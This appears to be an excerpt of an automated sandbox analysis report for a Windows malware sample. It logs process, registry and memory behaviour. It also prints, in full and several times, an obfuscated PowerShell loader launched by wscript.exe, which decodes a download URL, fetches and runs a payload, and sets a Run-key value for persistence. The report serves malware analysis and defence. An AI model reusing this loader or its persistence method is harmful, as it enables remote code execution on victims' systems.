Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Ricki = 1;$Gehenna='Substrin';$Gehenn", "", "", "0");
Source: Yara match File source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Takningers161 $Erhvervsrets $Tropein), (Isbaadenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aeroelastic = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Plirede230)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Indlggelse, $false).DefineType($Euklidisk, $St
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF8879900BD pushad ; iretd 3_2_00007FF8879900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887997954 push ebx; retf 3_2_00007FF88799796A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202109AD push ecx; mov dword ptr [esp], ecx 12_2_202109B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A056DD push dword ptr [ebx+edx*8]; ret 12_2_02A056E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A037CC push edi; ret 12_2_02A03806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A02A0A push es; retf 12_2_02A02A0C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0384E push edi; ret 12_2_02A03806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0498C push cs; ret 12_2_02A0498F

Boot Survival

Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF
Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF
Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
